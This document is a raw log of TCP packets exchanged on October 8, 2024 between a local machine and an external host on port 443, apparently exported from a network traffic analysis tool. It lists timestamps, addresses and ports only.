                                                                                                                                                  Oct 8, 2024 15:23:30.074095011 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.074265957 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.074289083 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.074361086 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.074363947 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.074377060 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.074409962 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.074806929 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.074821949 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.074821949 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.074831009 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.074877024 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.074928999 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.075695038 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.075711012 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.075772047 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.075783014 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.075793982 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.075860023 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.075860023 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.076682091 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.076697111 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.076842070 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.076849937 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.076956034 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.077285051 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.077301025 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.077373028 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.077380896 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.078016996 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.094949961 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.094975948 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.095079899 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.095101118 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.095408916 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.161351919 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.161385059 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.161463022 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.161478996 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.161647081 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.161647081 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.161835909 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.161855936 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.161947966 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.161947966 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.161957979 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.162039995 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.162595987 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.162611961 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.163182974 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.163186073 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.163197994 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.163234949 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.163245916 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.163408995 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.163408995 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.163417101 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.163429022 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.163471937 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.163501978 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.163880110 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.163892031 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.164062023 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.164287090 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.164308071 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.164633989 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.164644003 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.167406082 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.181705952 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.181725025 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.181869030 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.181885004 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.181955099 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.182596922 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.182612896 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.182709932 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.182709932 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.182720900 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.182769060 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.249141932 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.249169111 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.249562025 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.250005960 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.250005960 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.250029087 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.250111103 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.250333071 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.250494003 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.250500917 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.250592947 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.250947952 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.250962973 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.251041889 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.251050949 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.251410961 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.251610041 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.251626015 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.251910925 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.251919985 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.252397060 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.252522945 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.252542019 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.252669096 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.252676964 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.253319979 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.269220114 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.269243956 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.269484043 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.269484043 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.269499063 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.269566059 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.270673990 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.270690918 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.270787954 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.270787954 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.270797014 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.271050930 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.337145090 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.337172031 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.337248087 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.337265968 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.337497950 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.337697029 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.337714911 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.337837934 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.337837934 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.337843895 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.338010073 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.338504076 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.338522911 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.338607073 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.338607073 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.338612080 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.338654995 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.339029074 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.339055061 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.339123964 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.339129925 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.339402914 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.339864016 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.339880943 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.339951038 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.339956999 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.340049982 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.340703011 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.340720892 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.340822935 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.340828896 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.342003107 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.357429028 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.357446909 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.357512951 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.357522011 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.357690096 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.358253002 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.358270884 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.358364105 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.358369112 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.358431101 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.426997900 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.427018881 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.427124977 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.427136898 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.427189112 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.427627087 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.427644014 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.427788973 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.427793980 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.427858114 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.428247929 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.428266048 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.428333044 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.428337097 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.428395987 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.429317951 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.429338932 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.429413080 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.429418087 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.429429054 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.429500103 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.429671049 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.429688931 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.429908991 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.429913998 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.429980040 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.430314064 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.430329084 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.430399895 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.430406094 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.430464029 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.445132017 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.445153952 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.445787907 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.445864916 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.445866108 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.445866108 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.445883989 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.446006060 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.522814035 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.522850037 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.523015976 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.523030043 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.523142099 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.523298979 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.523322105 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.523410082 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.523413897 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.523539066 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.524004936 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.524028063 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.524209023 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.524214983 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.524327993 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.524844885 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.524867058 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.525721073 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.525727034 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.525742054 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.525866985 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.525872946 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.526014090 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.526722908 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.526741982 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.527149916 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.527149916 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.527157068 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.527225971 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.533572912 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.533598900 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.533869982 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.533878088 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.533970118 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.534624100 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.534646988 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.534718990 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.534723043 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.534774065 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.610589981 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.610610008 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.610714912 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.610737085 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.610784054 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.610784054 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.611273050 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.611289024 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.611377001 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.611399889 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.611454010 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.611855984 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.611879110 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.611939907 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.611948013 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.611998081 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.612823009 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.612844944 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.612895012 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.612929106 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.612943888 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.612967968 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.612997055 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.612997055 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.613074064 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.613738060 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.613753080 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.613877058 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.613878012 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.613888025 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.613962889 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.621437073 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.621452093 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.621586084 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.621606112 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.621656895 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.622412920 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.622428894 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.622587919 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.622601032 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.622759104 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.702886105 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.702907085 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.703035116 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.703058958 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.703104973 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.703104973 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.703223944 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.703239918 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.703353882 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.703353882 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.703361034 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.703413010 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.704194069 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.704209089 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.704308033 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.704313993 CEST4434970577.83.199.112192.168.2.16
